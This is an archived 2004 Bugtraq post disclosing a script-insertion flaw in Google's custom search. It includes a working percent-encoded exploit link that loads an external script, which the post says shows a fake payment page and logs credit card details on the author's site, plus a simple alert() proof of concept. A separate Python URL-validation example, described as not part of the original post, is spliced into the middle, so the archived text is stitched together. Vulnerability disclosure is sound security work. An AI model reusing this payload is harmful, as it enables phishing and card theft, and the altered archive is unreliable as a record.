lists.openwall.net: Open Source and information security mailing list archives
Date: 19 Oct 2004 16:38:59 -0000
From: Jim Ley <jim@...bering.com>
To: bugtraq@...urityfocus.com
Subject: Google Script Insertion Exploit
Website:  www.google.com

Description:  Google's custom web search does not prevent javascript from 
being inserted into the URL of the image, allowing malicious users to modify 
the content of the Google page, allowing phishing attacks, or to silently 
steal search terms/results/clicks or modify actual searches to always 
contain controlled results.  With Google's trusted status, the risk is almost 
certainly high.

The exploit is easiest to produce through a custom Google search form, which 
is commonly seen, used and understood on the web, but you can also do it 
through a simple link; this one works in IE:

http://www.google.com/custom?cof=L:%6a%61%76%61%73%63%72%69%70%74%3a%6a%61%76%61%73%63%72%69%70%74%3a%64%6f%63%75%6d%65%6e%74%2e%61%70%70%65%6e%64%43%68%69%6c%64%28%64%6f%63%75%6d%65%6e%74%2e%63%72%65%61%74%65%45%6c%65%6d%65%6e%74%28%27%73%63%72%69%70%74%27%29%29%2e%73%72%63%3d%27%68%74%74%70%3a%2f%2f%6a%69%62%62%65%72%69%6e%67%2e%63%6f%6d%2f%74%65%73%74%32%2e%6a%73%27

(This is an example of using the exploit for phishing: it changes the Google 
search page to a page informing the user that Google is now a chargeable 
service and they should enter their credit card details to continue; these 
are then logged on my site and the user is returned to a working Google. 
Currently there's a confirm box warning the user before the form is 
submitted.)

This example only works in IE, but other UAs also execute the javascript - 
it being a Google vulnerability, not an IE one.

The exploit can be simply demonstrated with the simpler URL:

http://www.google.com/custom?cof=L:javascript:javascript:alert('EEK!')
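As an added defensive example (not part of Jim Ley's post and not Google's code): a scheme allow-list for a user-supplied logo URL such as the `cof=L:` field above. The `;`-separated `KEY:VALUE` layout of `cof` and the `L:` field name are assumptions taken from the sample URLs in this post; the inputs checked are the post's `javascript:javascript:` payload plus constructed variants. The point the post makes is that the image URL is never checked for its scheme, so the fix is to parse the scheme and accept only `http`/`https`, rather than to blocklist the string `javascript:` (the doubled prefix and a percent-encoded prefix both defeat naive string matching but still parse to the scheme `javascript`).

```python
"""Scheme allow-listing for a user-supplied image URL.

Constructed example, not Google's code. The 'cof' query parameter is assumed
to be a ';'-separated list of KEY:VALUE fields in which 'L:' carries the logo
image URL, as the report's sample URLs suggest.
"""
from typing import Optional
from urllib.parse import parse_qs, urlsplit

ALLOWED_SCHEMES = {"http", "https"}
# Browsers silently drop tab, LF and CR from a URL before resolving its scheme,
# so strip them first or "java\tscript:" would slip past a scheme check.
_STRIPPED = str.maketrans("", "", "\t\n\r")


def logo_url_from_cof(cof: str) -> Optional[str]:
    """Return the value of the L: field, or None if absent.

    The ';' separator and the 'L:' field name are assumptions for this example.
    """
    for field in cof.split(";"):
        if field.startswith("L:"):
            return field[2:]
    return None


def is_safe_image_url(url: str) -> bool:
    """Accept only absolute http(s) URLs that name a host; reject everything else.

    Allow-listing the parsed scheme (rather than blocklisting 'javascript:')
    also rejects the report's 'javascript:javascript:' form, protocol-relative
    '//host/x' URLs and any scheme the browser might treat as executable.
    """
    cleaned = url.strip().translate(_STRIPPED)
    parts = urlsplit(cleaned)          # scheme is returned lower-cased
    return parts.scheme in ALLOWED_SCHEMES and bool(parts.netloc)


def logo_url_is_safe(query_string: str) -> bool:
    """Check a raw query string the way a server would see it.

    parse_qs percent-decodes once, as a web framework does; a request with no
    logo field is treated as safe because no <img> would be emitted for it.
    """
    params = parse_qs(query_string, keep_blank_values=True)
    for cof in params.get("cof", []):
        logo = logo_url_from_cof(cof)
        if logo is not None and not is_safe_image_url(logo):
            return False
    return True


if __name__ == "__main__":
    # Constructed inputs: the post's simple payload, its percent-encoded
    # equivalent (here encoding "javascript:javascript:alert(1)"), and a benign logo.
    samples = [
        "cof=L:javascript:javascript:alert('EEK!')",
        "cof=L:%6a%61%76%61%73%63%72%69%70%74%3a%6a%61%76%61%73%63%72%69%70%74"
        "%3a%61%6c%65%72%74%28%31%29",
        "cof=L:https://example.com/logo.gif&q=test",
    ]
    for qs in samples:
        print("accepted" if logo_url_is_safe(qs) else "rejected", qs)
```

The check runs on the decoded value of the field, so it does not matter whether the attacker percent-encodes the whole payload (as in the first URL in this post) or sends it in clear; both decode to a URL whose scheme is `javascript`, and both are rejected by the same rule. Requiring a non-empty host additionally rejects `https:///logo.gif` and protocol-relative URLs, which some user agents would resolve against the embedding page's scheme.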

The exploit has been public for over 2 years, and Google have been informed 
on multiple occasions.

More information, and another example exploit at 
http://jibbering.com/2004/10/google.html

Jim Ley.

http://jibbering.com/
